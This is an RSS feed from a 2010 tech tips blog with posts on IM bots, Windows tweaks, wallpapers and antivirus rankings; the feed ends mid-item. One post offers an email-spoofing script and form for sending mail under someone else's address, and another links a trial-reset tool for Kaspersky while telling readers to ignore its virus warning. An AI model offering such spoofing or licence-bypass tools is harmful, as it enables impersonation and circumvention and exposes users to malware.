<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Social Media and Technology Blog &#187; Education</title>
	<atom:link href="http://openhippo.com/category/education/feed/" rel="self" type="application/rss+xml" />
	<link>http://openhippo.com</link>
	<description>&#34; Share your Knowledge &#34;</description>
	<lastBuildDate>Sat, 21 Jan 2012 04:11:05 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Script:How to Write Your Own IM Bot:Tutorial</title>
		<link>http://openhippo.com/scripthow-to-write-your-own-im-bottutorial/</link>
		<comments>http://openhippo.com/scripthow-to-write-your-own-im-bottutorial/#comments</comments>
		<pubDate>Fri, 19 Mar 2010 09:04:34 +0000</pubDate>
		<dc:creator>Vikash Dhankar</dc:creator>
				<category><![CDATA[Education]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Internet]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[Programming]]></category>
		<category><![CDATA[Social Networking]]></category>
		<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[digg bot]]></category>
		<category><![CDATA[digg top stories bot]]></category>
		<category><![CDATA[download im bot script]]></category>
		<category><![CDATA[free bot download]]></category>
		<category><![CDATA[im bot]]></category>
		<category><![CDATA[im bot code]]></category>
		<category><![CDATA[im bot script]]></category>
		<category><![CDATA[make a free bot]]></category>
		<category><![CDATA[php bot]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=1800</guid>
		<description><![CDATA[In this tutorial you will able to writer your own instant messaging bots. What is understand by IM or Instant Messaging Bots ? The instant messaging bot are write for some specific purpose. Just like to fetch the results of particular university, or just like to fetch the TOP stories of Digg.com and many more [...]]]></description>
			<content:encoded><![CDATA[<p>In this tutorial you will able to writer your own instant messaging bots.</p>
<p>What is understand by IM or Instant Messaging Bots ?<br />
The instant messaging bot are write for some specific purpose. Just like to fetch the results of particular university, or just like to fetch the TOP stories of Digg.com and many more uses.</p>
<p><a href="http://openhippo.com/wp-content/uploads/2010/03/im-bot.jpg"><img class="alignnone size-full wp-image-1809" title="im bot" src="http://openhippo.com/wp-content/uploads/2010/03/im-bot.jpg" alt="" width="555" height="168" /></a></p>
<p>Here I am going to write a IM bot of Digg to Fetch the TOP stories from all the Categories:-</p>
<p>Follow the following steps to make your own IM Bots:-</p>
<p><strong>Step1: </strong>Go and Sign Up at <a href="http://www.imified.com/">http://www.imified.com/</a> .</p>
<p><strong>Step2</strong>: Choose the Bot Name &#8216;This name is the simple name you can choose any name related to your bot.</p>
<p><strong>Step3:</strong> Choose the Bot Screen Name &#8216;This is the unique name of bot&#8217;. As I have made the bot for the Digg.com Top stories so I have chosen the &#8220;diggstories&#8221; as the Bot Screen Name.</p>
<p><strong>Step4:</strong> Now here come the API in the play. There are many FREE API available for the Social networks.<br />
a) Digg.com API :- <a href="http://digg.com/api/docs/overview">Click Here</a><br />
b) Twitter API :- <a href="http://apiwiki.twitter.com/">Click Here</a><br />
c) Facebook API :- <a href="http://developers.facebook.com/">Click Here</a><br />
d) Google API :- <a href="http://code.google.com/">Click Here</a><br />
You can find many more API, according to your Requirement to develop your own IM bot.</p>
<p><strong>Step5</strong>: Now you provide a URL &#8220;where you have stored all your coding and API things&#8221; in a BOT URL Space.<br />
For example:My bot URL is<a href="http://www.openhippo.com/diggtoolkit/diggstories.php"> http://www.openhippo.com/diggtoolkit/diggstories.php</a><br />
If you don&#8217;t have your own hosting you can choose some free hosting services like <a title="Free Hosting" href="http://www.freehostia.com" target="_blank">http://www.freehostia.com</a></p>
<p><strong>Step6:</strong> Now you will get a bot Key, Don&#8217;t give this key to any one because this is the secret key of your bot. otherwise any other user can miss use your BOT.</p>
<p><strong>Step7:</strong> You are all done &#8221; Enjoy your Own IM bot&#8221;</p>
<p>Here are the coding of my IM BOT.<br />
<strong>Screen name: </strong>diggstories<strong><br />
Bot UR</strong>L:  <a href=" http://www.openhippo.com/diggtoolkit/diggstories.php">http://www.openhippo.com/diggtoolkit/diggstories.php</a></p>
<p>You can add this bot IM to any of you chat client, add with the name &#8220;<span style="color: #ff0000;"><strong>diggstories@bot.im</strong></span>&#8220;.</p>
<p><strong><span style="color: #ff0000;">Download the Digg Top Stories IM Bot</span> : <a href="http://openhippo.com/files/diggtoolkit.rar">Download</a></strong></p>
<p>Now you can write your own IM Bot in less then 10 minutes<strong>.<br />
</strong></p>
<p>If you have any difficulty, comment here. I will surely help you.</p>
<p>Share your Knowledge. <img src='http://openhippo.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/scripthow-to-write-your-own-im-bottutorial/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Script : Send Anonymous Emails or Fake Emails: FUN</title>
		<link>http://openhippo.com/script-send-anonymous-emails-or-fake-emails-fun/</link>
		<comments>http://openhippo.com/script-send-anonymous-emails-or-fake-emails-fun/#comments</comments>
		<pubDate>Sun, 14 Mar 2010 15:32:38 +0000</pubDate>
		<dc:creator>Vikash Dhankar</dc:creator>
				<category><![CDATA[Education]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[Programming]]></category>
		<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[anonymous email scrip]]></category>
		<category><![CDATA[anonymous emails]]></category>
		<category><![CDATA[free anonymous emails]]></category>
		<category><![CDATA[how to send anonymous emails]]></category>
		<category><![CDATA[send free anonymous emails]]></category>
		<category><![CDATA[send free fake emails]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=1758</guid>
		<description><![CDATA[I was thinking to to have fun with my friends, by making them curious about the incoming emails to them. Think how much it is interesting to send the emails to your friend from his email ID&#8230;OMG that will be interesting. I will be providing you the script but, don&#8217;t harm the people for the [...]]]></description>
			<content:encoded><![CDATA[<p>I was thinking to to have fun with my friends, by making them curious about the incoming emails to them.</p>
<p>Think how much it is interesting to send the emails to your friend from his email ID&#8230;OMG that will be interesting.</p>
<p>I will be providing you the script but, don&#8217;t harm the people for the FUN purpose, Fun should be remain fun.</p>
<p>Some of you might googled about the <a href="http://www.google.co.in/search?q=send+anonymous+emails" target="_blank">http://www.google.co.in/search?q=send+anonymous+emails</a> but rarely these site provide a good way for that,  I will be providing simple way to send fake emails.</p>
<p><strong>Tutorials to make a anonymous emails( fake emails ) for FUN</strong> :-</p>
<p>I am using PHP for sending anonymous emails, you can use different language, but PHP was good for me.</p>
<p>There will be two files:-</p>
<p>1)<span style="color: #ff0000;">index.htm</span></p>
<p>2)<span style="color: #ff0000;">fakeemails.php</span></p>
<p>The <span style="color: #ff0000;">index.htm</span> will be containing the simple code for the front end( forms,text area etc. But the <span style="color: #ff0000;">fakeemails.php</span> contains the actual code for the anonymous emails scripts.</p>
<p>I am using the  method =&#8221;POST&#8221; in the index.php but you can also use the $_GET, it depends on you.  The POST will will not show your contents on the browser address bar.</p>
<p><a title="Fake Emails: Have FUN" href="http://openhippo.com/fake-emails/" target="_blank"><strong><span style="color: #ff0000;">Send the Fake Email</span></strong></a> Only FUN    <a title="Anonymous Emails:Have FUN" href="http://openhippo.com/fake-emails/" target="_blank"><span style="color: #ff0000;"><strong>Send the Anonymous Emails</strong></span></a></p>
<p><strong>Download the Script</strong> [<strong> <a title="Download Script: Anonymous Emails" href="http://openhippo.com/fake-emails/anonymous email.rar" target="_blank">Download</a></strong> ]<span style="color: #333333;"> </span><br />
Send Anonymous Email(For Fun Purpose Only)</p>
<p><a href="http://www.openhippo.com/fake-emails/">Send anonymous emails</a></p>
<form action="/fake-emails/fakeemails.php" method="post">
<table border="0">
<tbody>
<tr>
<td>To :</td>
<td>
<input name="to" type="text" /></td>
</tr>
<tr>
<td>From :</td>
<td>
<input name="from" type="text" /></td>
</tr>
<tr>
<td>From Name :</td>
<td>
<input name="name" type="text" /></td>
</tr>
<tr>
<td>Subject :</td>
<td>
<input name="subject" type="text" /></td>
</tr>
<tr>
<td>Message :</td>
<td><textarea cols="50" rows="10" name="message"></textarea></td>
</tr>
<tr>
<td></td>
<td>
<input type="submit" value="Send" /></td>
</tr>
</tbody>
</table>
</form>
<p>Enjoy the Code, Don&#8217;t harm your friends and others..</p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/script-send-anonymous-emails-or-fake-emails-fun/feed/</wfw:commentRss>
		<slash:comments>15</slash:comments>
		</item>
		<item>
		<title>Create Ubuntu Live USB boot drive</title>
		<link>http://openhippo.com/create-ubuntu-live-usb-boot-drive/</link>
		<comments>http://openhippo.com/create-ubuntu-live-usb-boot-drive/#comments</comments>
		<pubDate>Wed, 10 Feb 2010 13:13:11 +0000</pubDate>
		<dc:creator>Vikash Dhankar</dc:creator>
				<category><![CDATA[Education]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Open Source]]></category>
		<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[Windows 7]]></category>
		<category><![CDATA[Windows XP]]></category>
		<category><![CDATA[linux live USB creater]]></category>
		<category><![CDATA[ubuntu live usb]]></category>
		<category><![CDATA[ubuntu live usb os]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=1596</guid>
		<description><![CDATA[What you do when you loose your Windows or operating system in your PC. First thing in your mind comes is to reinstall the operation system, But now I am telling you the simple way of recovering your files and folder via a Ubuntu live USB operating system. An Ubuntu Live USB device allows you [...]]]></description>
			<content:encoded><![CDATA[<p>What you do when you loose your Windows or operating system in your PC. First thing in your mind comes is to reinstall the operation system, But now I am telling you the simple way of recovering your files and folder via a Ubuntu live USB operating system.</p>
<p>An Ubuntu Live USB device allows you to take the Ubuntu Linux operating system with you anywhere! In addition, if you ever run into a problem where you cannot boot Windows (and cannot access your files), you can use an Ubuntu Live USB drive to boot your computer into a nice Linux GUI environment and recover your files. An entire operating system in a thumb-drive.<br />
Its very easy to mount image on the USB.<br />
The application is fairly simple. First, you select an ISO image or CD/DVD source. Next, you choose the thumb-drive that you want to install the ISO/CD/DVD image on. Finally, you can select the size of a persistence file (this stores your documents and settings on the USB drive even after you have shut-down the computer &#8211; highly recommended). There are various persistence file sizes from 128MB to 4096MB so that you can maximize the use of your thumb-drive capacity.</p>
<div id="attachment_1597" class="wp-caption aligncenter" style="width: 413px"><a href="http://openhippo.com/wp-content/uploads/2010/02/ubuntu-live-imager.png"><img class="size-full wp-image-1597" title="ubuntu-live-imager" src="http://openhippo.com/wp-content/uploads/2010/02/ubuntu-live-imager.png" alt="ubuntu-live-imager" width="403" height="533" /></a><p class="wp-caption-text">ubuntu-live-imager</p></div>
<p>To use this tool you must have the .iso of UBUNTU or family of ubuntu.</p>
<p><a title="Download ubuntu usb live creater" href="http://www.softpedia.com/get/System/Boot-Manager-Disk/Ubuntu-Live-USB-Imager.shtml" target="_blank">Download Ubuntu Live Imager</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/create-ubuntu-live-usb-boot-drive/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Top Antivirus 2010</title>
		<link>http://openhippo.com/top-antivirus-2010/</link>
		<comments>http://openhippo.com/top-antivirus-2010/#comments</comments>
		<pubDate>Mon, 01 Feb 2010 12:09:15 +0000</pubDate>
		<dc:creator>Vikash Dhankar</dc:creator>
				<category><![CDATA[Education]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Technology]]></category>
		<category><![CDATA[best antivirus 2010]]></category>
		<category><![CDATA[top antivirus]]></category>
		<category><![CDATA[top antivirus 2010]]></category>
		<category><![CDATA[top antivirus list 2010]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=1539</guid>
		<description><![CDATA[Antivirus are the tools/software used for the computer security and data protection. As data are much more important entity for all PC users. In the previous year 2009, many hybrid Trojans were came into the networks, these were very dangerous, each virus/Trojans had one or more dangerous quality. To keep this many anitvirus, updated theirs [...]]]></description>
			<content:encoded><![CDATA[<p>Antivirus are the tools/software used for the computer security and data protection. As data are much more important entity for all PC users. In the previous year 2009, many hybrid Trojans were came into the networks, these were very dangerous, each virus/Trojans had one or more dangerous quality.</p>
<p>To keep this many anitvirus, updated theirs virus library into the software. The following are the Top antivirus in 2010 according to the user comments.</p>
<p><strong>1. Kaspersky Antivirus 2010: <a href="http://www.kaspersky.com/" target="_blank">Download</a><br />
</strong></p>
<div id="attachment_1540" class="wp-caption aligncenter" style="width: 160px"><a href="http://openhippo.com/wp-content/uploads/2010/02/kaspersky-2010-box.jpg"><img class="size-thumbnail wp-image-1540" title="kaspersky-2010" src="http://openhippo.com/wp-content/uploads/2010/02/kaspersky-2010-box-150x150.jpg" alt="kaspersky-2010" width="150" height="150" /></a><p class="wp-caption-text">kaspersky-2010</p></div>
<p><strong>2. Shield Deluxe &#8211; Antivirus Protection: <a href="http://www.pcsecurityshield.com/" target="_blank">Download</a><br />
</strong></p>
<div id="attachment_1541" class="wp-caption aligncenter" style="width: 160px"><a href="http://openhippo.com/wp-content/uploads/2010/02/shield_deluxe_2008.jpg"><img class="size-full wp-image-1541" title="shield_deluxe_2010" src="http://openhippo.com/wp-content/uploads/2010/02/shield_deluxe_2008.jpg" alt="Shield Deluxe" width="150" height="150" /></a><p class="wp-caption-text">Shield Deluxe</p></div>
<p><strong>3.Trend Micro Antivirus Internet Security 2010: </strong><a href="http://apac.trendmicro.com/apac/home/" target="_blank"><strong>Download</strong></a></p>
<p><strong></p>
<div id="attachment_1542" class="wp-caption aligncenter" style="width: 160px"><strong><a href="http://openhippo.com/wp-content/uploads/2010/02/Trend-Micro-Antivirus-Internet-Security-2010.jpg"><img class="size-full wp-image-1542" title="Trend Micro Antivirus Internet Security 2010" src="http://openhippo.com/wp-content/uploads/2010/02/Trend-Micro-Antivirus-Internet-Security-2010.jpg" alt="Trend Micro Antivirus" width="150" height="150" /></a></strong><p class="wp-caption-text">Trend Micro Antivirus</p></div>
<p></strong></p>
<p><strong> 4. Norton Antivirus 2010 : </strong><a href="http://www.symantec.com/norton/antivirus" target="_blank"><strong>Download</strong></a></p>
<div id="attachment_1543" class="wp-caption aligncenter" style="width: 160px"><a href="http://openhippo.com/wp-content/uploads/2010/02/symantec-norton-antivirus-2010.jpg"><img class="size-full wp-image-1543" title="symantec-norton-antivirus-2010" src="http://openhippo.com/wp-content/uploads/2010/02/symantec-norton-antivirus-2010.jpg" alt="Norton Antivirus 2010  " width="150" height="150" /></a><p class="wp-caption-text">Norton Antivirus 2010  </p></div>
<p><strong>5. Panda Antivirus Pro 2010: </strong><a href="http://www.pandasecurity.com/usa/homeusers/solutions/antivirus/" target="_blank"><strong>Download</strong></a></p>
<p><strong></p>
<div id="attachment_1544" class="wp-caption aligncenter" style="width: 160px"><strong><a href="http://openhippo.com/wp-content/uploads/2010/02/Panda-Antivirus-Pro-2010.jpg"><img class="size-full wp-image-1544" title="Panda Antivirus Pro 2010" src="http://openhippo.com/wp-content/uploads/2010/02/Panda-Antivirus-Pro-2010.jpg" alt="Panda Antivirus Pro 2010" width="150" height="150" /></a></strong><p class="wp-caption-text">Panda Antivirus Pro 2010 </p></div>
<p>6. ESET NOD32 Antivirus: <a href="http://www.eset.com/" target="_blank"><strong>Download</strong></a></p>
<div id="attachment_1545" class="wp-caption aligncenter" style="width: 160px"><strong><a href="http://openhippo.com/wp-content/uploads/2010/02/ESET-NOD32-Antivirus.jpg"><img class="size-full wp-image-1545" title="ESET NOD32 Antivirus" src="http://openhippo.com/wp-content/uploads/2010/02/ESET-NOD32-Antivirus.jpg" alt="ESET NOD32 Antivirus " width="150" height="150" /></a></strong><p class="wp-caption-text">ESET NOD32 Antivirus </p></div>
<p></strong></p>
<p><strong>7. ZoneAlarm Anti-virus 2010 : </strong><a href="http://www.zonealarm.com/" target="_blank"><strong>Download</strong></a></p>
<div id="attachment_1546" class="wp-caption aligncenter" style="width: 160px"><strong><strong><a href="http://openhippo.com/wp-content/uploads/2010/02/ZoneAlarm-Anti-virus-2010.jpg"><img class="size-full wp-image-1546" title="ZoneAlarm Anti-virus 2010" src="http://openhippo.com/wp-content/uploads/2010/02/ZoneAlarm-Anti-virus-2010.jpg" alt="ZoneAlarm Anti-virus 2010    " width="150" height="150" /></a></strong></strong><p class="wp-caption-text">ZoneAlarm Anti-virus</p></div>
<p><strong>8. AVG Free Antivirus 2010 : </strong><a href="http://www.avg.com/in-en/homepage" target="_blank"><strong>Download</strong></a></p>
<div id="attachment_1547" class="wp-caption aligncenter" style="width: 160px"><a href="http://openhippo.com/wp-content/uploads/2010/02/avg-free-2010.jpg"><img class="size-full wp-image-1547" title="avg free 2010" src="http://openhippo.com/wp-content/uploads/2010/02/avg-free-2010.jpg" alt="avg free 2010" width="150" height="150" /></a><p class="wp-caption-text">avg free 2010</p></div>
<p><strong>9. BitDefender Antivirus 2010 : </strong><a href="http://www.bitdefender.com/" target="_blank"><strong>Download</strong></a></p>
<div id="attachment_1548" class="wp-caption aligncenter" style="width: 160px"><a href="http://openhippo.com/wp-content/uploads/2010/02/BitDefender-Antivirus-2010.gif"><img class="size-full wp-image-1548" title="BitDefender Antivirus 2010" src="http://openhippo.com/wp-content/uploads/2010/02/BitDefender-Antivirus-2010.gif" alt="BitDefender Antivirus 2010" width="150" height="150" /></a><p class="wp-caption-text">BitDefender Antivirus</p></div>
<p><strong>10. McAfee Antivirus 2010 : </strong><a href="http://www.mcafee.com/" target="_blank"><strong>Download</strong></a></p>
<div id="attachment_1549" class="wp-caption aligncenter" style="width: 160px"><a href="http://openhippo.com/wp-content/uploads/2010/02/MacAfee-Antiyirus-2010.jpg"><img class="size-full wp-image-1549" title="MacAfee Antiyirus 2010" src="http://openhippo.com/wp-content/uploads/2010/02/MacAfee-Antiyirus-2010.jpg" alt="MacAfee Antiyirus 2010" width="150" height="150" /></a><p class="wp-caption-text">McAfee Antiyirus</p></div>
<p>These are the top 10 antivirus in the starting of 2010. Last year some of the antivirus were are the same position like Kaspersky, Nortan, Node32..</p>
<p>Use the antivirus and that also updated version, to protect your data.</p>
<p><strong><br />
</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/top-antivirus-2010/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Enable God Mode : Windows 7</title>
		<link>http://openhippo.com/enable-god-mode-windows-7/</link>
		<comments>http://openhippo.com/enable-god-mode-windows-7/#comments</comments>
		<pubDate>Tue, 05 Jan 2010 16:44:45 +0000</pubDate>
		<dc:creator>Vikash Dhankar</dc:creator>
				<category><![CDATA[Education]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[Windows 7]]></category>
		<category><![CDATA[enable god mode]]></category>
		<category><![CDATA[god mode key]]></category>
		<category><![CDATA[windows 7 god mode]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=1471</guid>
		<description><![CDATA[Windows 7 had came up with many good features and GOD MODE is one of them What is GOD MODE : Its a virtual copy of control panel ,containing module which are in use and other 278 commands to control and manage your Windows 7 front and backend. How to enable the GOD MODE:- 1. [...]]]></description>
			<content:encoded><![CDATA[<p>Windows 7 had came up with many good features and GOD MODE is one of them</p>
<p><span style="text-decoration: underline;"><strong>What is GOD MODE :</strong></span></p>
<blockquote><p>Its a virtual copy of control panel ,containing module which are in use and other 278 commands to control and manage your Windows 7 front and backend.</p>
</blockquote>
<p>How to enable the GOD MODE:-</p>
<p>1. Make a folder on the desktop.</p>
<p>2. Rename the folder with : <span style="color: #ff0000;"><em>{ED7BA470-8E54-465E-825C-99712043E01C} </em></span></p>
<p style="text-align: center;"><span style="color: #ff0000;"><em> </em></span></p>
<div id="attachment_1472" class="wp-caption aligncenter" style="width: 280px"><em><em><a href="http://openhippo.com/wp-content/uploads/2010/01/godmodeicon.jpg"><img class="size-full wp-image-1472" title="god mode" src="http://openhippo.com/wp-content/uploads/2010/01/godmodeicon.jpg" alt="god mode" width="270" height="236" /></a></em></em><p class="wp-caption-text">God Mode Icon</p></div>
<p><em> </em></p>
<p>3. Now double click on the folder ( It is a GOD MODE folder ) Containing all the useful commands that you can do with the Control Panel. Only difference is that its very easy way to handle your PC modules and other tools.</p>
<p><a href="http://openhippo.com/wp-content/uploads/2010/01/god-mode-desktop.jpg"><img class="alignnone size-full wp-image-1473" title="god mode desktop" src="http://openhippo.com/wp-content/uploads/2010/01/god-mode-desktop.jpg" alt="" width="547" height="410" /></a></p>
<p>Enjoy the Windows 7 Tweak. Enable God Mode and become the god of your PC.</p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/enable-god-mode-windows-7/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Use Kaspersky after 30 days trial period</title>
		<link>http://openhippo.com/use-kaspersky-after-30-days-trial-period/</link>
		<comments>http://openhippo.com/use-kaspersky-after-30-days-trial-period/#comments</comments>
		<pubDate>Sun, 03 Jan 2010 11:09:14 +0000</pubDate>
		<dc:creator>Vikash Dhankar</dc:creator>
				<category><![CDATA[Education]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Technology]]></category>
		<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[Windows 7]]></category>
		<category><![CDATA[Windows XP]]></category>
		<category><![CDATA[kaspersky 30 days trial reset]]></category>
		<category><![CDATA[kaspersky hack]]></category>
		<category><![CDATA[kaspersky reset]]></category>
		<category><![CDATA[reset 30 days trial]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=1451</guid>
		<description><![CDATA[Kaspersky antivirus and internet security is one of the best antivirus tool available, since 2006 kaspersky is leading the antivirus market after the bitdefender. I am a Ubuntu guy, so I less go in the windows but You might be using the kaspersky to clean up your PC. Kaspersky gives a 30 days trail pack, [...]]]></description>
			<content:encoded><![CDATA[<p>Kaspersky antivirus and internet security is one of the best antivirus tool available, <a href="http://openhippo.com/wp-content/uploads/2010/01/192479.jpg"><img class="size-full wp-image-1452 alignright" title="kaspersky reset" src="http://openhippo.com/wp-content/uploads/2010/01/192479.jpg" alt="kaspersky reset" width="184" height="170" /></a>since 2006 kaspersky is leading the antivirus market after the bitdefender.</p>
<p>I am a Ubuntu guy, so I less go in the windows but You might be using the kaspersky to clean up your PC.</p>
<p>Kaspersky gives a 30 days trail pack, to use their antivirus, after that kaspersky is disabled and its not possible to use the kaspersky antivirus, even you uninstall the kaspersky.</p>
<p><strong>How to use the Kaspesky antivirus after 30 days trial.</strong></p>
<p><span style="color: #800000;">Here are the steps :</span></p>
<p>1. Unistall the Kaspersky.</p>
<p>2. install the tool( kaspesky will say, that it is virus) but its not, i used ans my friend are using that tool to reset the kaspersky.</p>
<p>3. Download the tool [ <a href="http://www.ziddu.com/download/5285847/BOX_KTR_v2.5A.rar.html" target="_blank">here</a> ]</p>
<p>4. Now run the tool, it will clean the Kapsersky restrickted registry keys.</p>
<p>5. Now you install the Kapsersky, it will activate for the another 30 days.</p>
<p>SO after 30 days do the same..</p>
<p>ENjoy your PC</p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/use-kaspersky-after-30-days-trial-period/feed/</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>How to : Extract Bing.com Wallpapers</title>
		<link>http://openhippo.com/how-to-extract-bing-com-wallpapers/</link>
		<comments>http://openhippo.com/how-to-extract-bing-com-wallpapers/#comments</comments>
		<pubDate>Sat, 02 Jan 2010 22:01:26 +0000</pubDate>
		<dc:creator>Ritu sharma</dc:creator>
				<category><![CDATA[Education]]></category>
		<category><![CDATA[Fun Zone]]></category>
		<category><![CDATA[Gallery]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[Windows 7]]></category>
		<category><![CDATA[bing daily wallpapers]]></category>
		<category><![CDATA[bing hack]]></category>
		<category><![CDATA[bing.com wallpapers]]></category>
		<category><![CDATA[extract bing wallpapers.]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=1441</guid>
		<description><![CDATA[As you have found that Microsofts bing.com have a good feature of providing good wallpapers. In my last post I have uploaded the top voted wallpapers of bing.com in 2009. [ Here ] Here is the quick trick of extracting the wallpapers of bing [ Daily ] Follow the steps :- 1. Go to site [...]]]></description>
			<content:encoded><![CDATA[<p>As you have found that Microsofts bing.com have a good feature of providing good wallpapers. In my last post I have uploaded the top voted wallpapers of bing.com in 2009. [ <a title="Bing top wallpapers 2009" href="http://openhippo.com/2010/01/02/bingtop-voted-wallpapers-2009/" target="_blank">Here </a>]</p>
<p>Here is the quick trick of extracting the wallpapers of bing [ Daily ]</p>
<p>Follow the steps :-</p>
<p>1. Go to site <span style="color: #ff0000;">http://www.bing.com</span></p>
<p>2. Press the<span style="color: #ff0000;"> Ctrl + U</span> ( for viewing the source code ) or you can Go to <span style="color: #ff0000;">View</span> &#8211; <span style="color: #ff0000;">Page Source</span></p>
<p>3, Find the keyword &#8220;<strong><span style="color: #ff0000;">.jpg</span></strong>&#8221; . and find the URL which start with { <strong><span style="color: #ff0000;">url: &#8216; </span></strong>highlighted . As given in the pic below.</p>
<p><a href="http://openhippo.com/wp-content/uploads/2010/01/bing-trick.jpg"><img class="alignnone size-full wp-image-1442" title="bing trick" src="http://openhippo.com/wp-content/uploads/2010/01/bing-trick.jpg" alt="" width="413" height="172" /></a></p>
<p>Todays bing page is :-</p>
<p><a href="http://openhippo.com/wp-content/uploads/2010/01/today-bing.jpg"><img class="alignnone size-full wp-image-1443" title="today bing" src="http://openhippo.com/wp-content/uploads/2010/01/today-bing.jpg" alt="" width="543" height="407" /></a></p>
<p>Now the backgroung of bing.com can be extracted using the above method, we get :-</p>
<p>okay first the URL will be :-  <span style="color: #ff0000;"><strong><span style="color: #0000ff;">http://www.bing.com</span>/\/fd\/hpk2\/VirginIslands_ROW186053674.jpg<br />
</strong></span><br />
Here is the actual wallpaper :-</p>
<p><a href="http://openhippo.com/wp-content/uploads/2010/01/VirginIslands_ROW186053674.jpg"><img class="alignnone size-full wp-image-1446" title="VirginIslands_ROW186053674" src="http://openhippo.com/wp-content/uploads/2010/01/VirginIslands_ROW186053674.jpg" alt="" width="556" height="297" /></a></p>
<p>SO enjoy the trick, and download your favorites wallpapers.</p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/how-to-extract-bing-com-wallpapers/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>How to : Extract Wallpapers from Windows 7 Themes</title>
		<link>http://openhippo.com/how-to-extract-wallpapers-from-windows-7-themes/</link>
		<comments>http://openhippo.com/how-to-extract-wallpapers-from-windows-7-themes/#comments</comments>
		<pubDate>Sat, 02 Jan 2010 09:30:01 +0000</pubDate>
		<dc:creator>Vikash Dhankar</dc:creator>
				<category><![CDATA[Education]]></category>
		<category><![CDATA[Gallery]]></category>
		<category><![CDATA[Tips and Tricks]]></category>
		<category><![CDATA[Windows 7]]></category>
		<category><![CDATA[extract wallpapers from windows 7 themes]]></category>
		<category><![CDATA[extract windows 7 themes]]></category>
		<category><![CDATA[windows 7 themes]]></category>
		<category><![CDATA[windows 7 thems hack]]></category>

		<guid isPermaLink="false">http://openhippo.com/?p=1424</guid>
		<description><![CDATA[Windows has added a very good feature in the Windows 7: Automation in the background wallpapers. You can download the free Windows 7 themes : [ Click Here ] Now, you many find these wallpapers very much addictive and want to extract those wallpapers from the windows 7 thems. Its very much easy: Follow one [...]]]></description>
			<content:encoded><![CDATA[<p>Windows has added a very good feature in the Windows 7: Automation in  the background wallpapers.<br />
You can download the free Windows 7 themes : [ <a title="Download free windows 7 themes" href="http://openhippo.com/2009/12/29/download-free-windows-7-themes/" target="_blank">Click Here</a> ]</p>
<p>Now, you many find these wallpapers very much addictive and want to extract those wallpapers from the windows 7 thems.<br />
Its very much easy:<br />
Follow one step to extract wallpapers from windows 7 thems.</p>
<blockquote><p>C:\Users\<strong><span style="color: #ff0000;">YOURNAME</span></strong>\AppData\Local\Microsoft\Windows\Themes\<strong><span style="color: #ff0000;">THEMENAME</span></strong></p>
<p><strong><span style="color: #3366ff;">OR</span></strong></p>
<p>C:\Users\<strong><span style="color: #ff0000;">YOURNAME</span></strong>\AppData\Local\Microsoft\Windows\Themes\</p></blockquote>
<p><span style="color: #ff0000;">YOURNAME</span> stands for the username of the MACHINE <img src='http://openhippo.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p><a href="http://openhippo.com/wp-content/uploads/2010/01/windows-7-theme1.jpg"><img class="alignnone size-full wp-image-1426" title="windows 7 theme" src="http://openhippo.com/wp-content/uploads/2010/01/windows-7-theme1.jpg" alt="" width="549" height="269" /></a></p>
<p>Enjoy your favi wallpapers out of windows 7 theme</p>
<p>Share Your Knowledge</p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/how-to-extract-wallpapers-from-windows-7-themes/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Download Youtube Video: Kiss</title>
		<link>http://openhippo.com/download-youtube-video-kiss/</link>
		<comments>http://openhippo.com/download-youtube-video-kiss/#comments</comments>
